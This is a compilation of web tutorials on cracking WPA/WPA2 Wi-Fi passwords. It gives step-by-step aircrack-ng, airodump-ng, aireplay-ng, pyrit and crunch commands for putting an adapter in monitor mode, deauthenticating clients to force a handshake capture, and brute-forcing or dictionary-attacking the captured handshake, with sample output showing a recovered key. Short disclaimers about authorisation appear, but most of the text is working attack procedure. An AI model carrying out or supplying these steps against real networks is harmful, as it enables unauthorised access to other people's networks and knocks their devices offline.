Cracking WPA/WPA2 handshake without Wordlist :

Cracking WPA/WPA2 handshake without Wordlist :

Hello guys, I'm not going to discuss handshakes since I guess you all are familiar with airmon, airodump and aireplay and now how to get them. 
that's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the capfile.
I was looking for a method that is full proof without actually storing a huge wordlist on your desktop (talking about lots of lots of terrabites)
so i came up with the following:

# crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

(notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)

meaning that crunch is making a list with minimum 0 and maximum 25 characters with alfanumeric small and cap characters that are not stored in a wordlistfile.
The "|" ends the crunch command and then we go to the aircrack command:
With the bssid of the "victim" (notice you have to be authorised by the victim to do the test) and -w- wich specifies the handshake.cap file.

It took me about 30 minutes to crack the following WPA password: hickmin123 (wich is an easy password because there are no caps in the password)
However I believe its almost a fullproof method and with lots of time you are able to crack long passwords.
Now the real question...


Crunch with Pyrit together :

crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

Creating Wordlists With Crunch

Creating Wordlists With Crunch

12JUL

Many times in penetration testing engagements you will discover authentication forms that you will need to bypass in order to gain access to an application or to a remote system.Having a big and a good wordlists always help but as a penetration tester you must be able to create your own custom wordlists depending on thesituation.There are a variety of tools that can assist you on this but here we will focus on Crunch.

Create a Sample Wordlist

The first thing that you need to do is to open terminal and write cd /pentest/passwords/crunch

Next we execute the following command

./crunch 5 5 admin -o pentestlab.txt

Create a sample wordlist

This will instruct crunch to create a wordlist that will have minimum length of characters 5,maximum length of characters 5 with the characters of admin and it will save it on a .txt file called pentestlab as you can see it and in the image below.

Output of a sample wordlist

Of course instead of just letters we can create a wordlist that will include only numbers with the command:

./crunch 5 5 12345 -o numbers.txt

The same method applies and if we want to create a wordlist mixed with letters and numbers.

./crunch 5 5 pentestlab123 -o numbersletters.txt

Special Characters

For special characters like !$% you will need to execute something like the following:

./crunch 5 5 pentestlab\%\@\!

This is because some special characters need escaping and the \ is used before the character.

Special Characters

String Permutations

Here there are two options.First options is when we will want to generate something based on the characters of a word.For example ./crunch 1 1 -p abc  will produce the following list:

String Permutation – Characters

The second option is when we will want to create a list based on different words.For example the words blue and red can be bluered or redblue.We can achieve this with the command ./crunch 1 1 -p pen test lab

String Permutation – Words

Splitting Wordlists

If we use the -b option we will instruct crunch to create a wordlist which will be divided into multiple files.Another option that we can combine with that command is to choose the size of our wordlist.For example:

./crunch 6 6 0123456789 -b 1mb -o START

This will generate wordlists which will be 1Mb each and with 6 characters size and it will include the characters 0123456789.

Splitting Wordlists

Specify the number of words

Crunch allows us to specify the number of words in each wordlist.This will create a wordlists that it will contain 20 words maximum by taken a specific charset of lalpha which is [abcdefghijklmnopqrstuvwxyz].

./crunch 3 3 -f charset.lst lalpha -o START -c 20

Alternatively you can use any other charset from the list that comes with crunch if you don’t want to use a custom charset.

Number of words

Prefix Wordlists

Now lets say that we want to create a wordlist that will contains the word pentestlab followed by 3 randomcharacters.The command for that will be:

./crunch 13 13 -f charset.lst lalpha -t pentestlab@@@

which will produce the following output:

Prefix wordlists – Characters

Alternatively if we want the word admin to be in the middle we can modify the command like this:

./crunch 9 9 -f charset.lst -t @@admin@@

Prefix Wordlists based on words

Compression

You can compress your wordlist with the -z option using either bzip,gzip or lzma.

Example: ./crunch 4 4 -f charset.lst lalpha -o wordlist -z gzip

Compress the wordlist

Conclusion

Creating wordlists can facilitate your needs when performing a penetration test.Crunch of course offers a variety of options and combinations that a user can play with.Trying to brute force of course an application or a system with a wordlist can of course lock you out depending on the account lockout policy but it always helps if you can have your own custom wordlists that may be help you to obtain access.


VIDEO TUTORIAL :

Hacking wifi with Xiaopan

Remember this is a professional wireless auditing tool and you should only use it on your clients or personal networks to test for security. Do not hack networks that you do not own or affiliated with.​

Ok so many people want to know how to hack WPA / WPA2 with a dictionary wordlist. It is an extremely easy to do but as there are so many combinations of passwords you need to be strategic in creating your own wordlist based on research of the potential format of default passwords the ISP or AP manufacturer may have put in place.

Also when someone changes that password typically they choose a very simple password like xiaopan1234. For that I suggest you use crunch.

Now, before you start this tutorial you should have Xiaopan 0.4.5, a compatible device and it should be installed in virtualisation or as a Live USB or CD (USB is recommended).

I Used 
Xiaopan 0.4.5
Installed it using LiLi USB Creator
ALFA AWUS036H

It took me about 3 minutes to hack but I was using my own router so I embedded the password in the wordlist I created. Longest part was capturing the handshake which took about 1 minute.

Step 1
Open Minidwep (4th icon from the right and click OK to the disclaimer)​

Step 2
Click Scan and make sure WPA/WPA2 is selected in the Encryption drop down box


Step 3
Now select the network you want to hack


Step 4
Now you want to select Launch, this will try to capture the handshake, it can take awhile


Step 5
After you have captured the handshake this box will come up, navigate to the wordlist you created


Step 6
When you found it click OK


Step 7
Now when it finds the password this box will show up


Step 8
Now we can save the handshake, the Key will be saved in the tmp folder

Step 9
Now you can save it your computer. I suggest you mount another USB using the mount tool (8th icon on right) and navigate to your mnt/device

Step 10
Select the file you want to copy.

​

This was a quick tutorial but plan to add more later. If you have any questions please feel free to ask.

Crack Wi-Fi with WPA/WPA2-PSK using Aircrack-ng

This article is a summary of effective commands that just work.

With the help a these commands you will be able to crack WPA/WPA2 Wi-Fi Access Points which use PSK (Pre-Shared Key) encryption.

The objective is to capture the WPA/WPA2 authentication handshake and thencrack the PSK using aircrack-ng.

The full tutorial about WPA/WPA2 cracking can be found here.

Here are the basic steps we will be going through:

• 0. Install the latest aircrack-ng
• 1. Start the wireless interface in monitor mode using airmon-ng
• 2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
• 3. [Optional] Use aireplay-ng to deauthenticate the wireless client
• 4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake

0. Install the Latest Aircrack-ng

Install the required dependencies :

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Download and install the latest aircrack-ng :

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc1.tar.gz -O - | tar -xz
$ cd aircrack-ng-1.2-rc1
$ sudo make
$ sudo make install

Be sure to check that the version of aircrack-ng is up-to-date because you may see problems with older versions.

$ aircrack-ng --help | head -3

  Aircrack-ng 1.2 beta3 r2393 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

1. Start the Wireless Interface in Monitor Mode

Find and stop all processes that could cause trouble :

$ sudo airmon-ng check kill

Start the wireless interface in monitor mode :

$ sudo airmon-ng start wlan0

Notice that airmon-ng enabled monitor-mode on mon0 :

Interface Chipset  Driver

wlan0  Intel 6235 iwlwifi - [phy0]
    (monitor mode enabled on mon0)

So, the correct interface name to use in later parts of the tutorial is mon0.

2. Start Airodump-ng to Collect Authentication Handshake

Now, when our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air.

It can be done with airodump-ng command :

$ sudo airodump-ng mon0

All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen :

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1

Now start airodump-ng on AP channel with filter for BSSID to collect authentication handshake for the access point we are interested in :

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one

Option	Description
-c	The channel for the wireless network
--bssid	The MAC address of the access point
-w	The file name prefix for the file which will contain authentication handshake
mon0	The wireless interface
--ignore-negative-one	Removes 'fixed channel : -1' message

Now wait until airodump-ng captures a handshake... or go to the step #3 if you want to force this process.

After some time you'll notice the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.

This means airodump-ng has successfully captured the handshake.

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56

3. [Optional] Use Aireplay-ng to Deauthenticate the Wireless Client

This step is optional. If you can't wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake.

Send DeAuth to broadcast :
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Send directed DeAuth (attack is more effective when it is targeted) :
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one

Option	Description
--deauth 100	The number of de-authenticate frames you want to send (0 for unlimited)
-a	The MAC address of the access point
-c	The MAC address of the client
mon0	The wireless interface
--ignore-negative-one	Removes 'fixed channel : -1' message

4. Run Aircrack-ng to Crack WPA/WPA2-PSK

To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here.

Crack the WPA/WPA2-PSK with the following command :

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

Option	Description
-w	The name of the dictionary file
-b	The MAC address of the access point
WPAcrack.cap	The name of the file that contains the authentication handshake

                         Aircrack-ng 1.2 beta3 r2393

                   [00:08:11] 548872 keys tested (1425.24 k/s)

                           KEY FOUND! [ 987654321 ]

      Master Key     : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 
                       CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 

      Transient Key  : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 
                       AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 
                       DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 
                       A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 

      EAPOL HMAC     : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62

In some cases, it's not possible to crack WPA/WPA2-PSK key in one step, especially while using a large dictionary. Combine Aircrack-ng with John The Ripper to Pause/Resume Cracking.

Video Tutorial :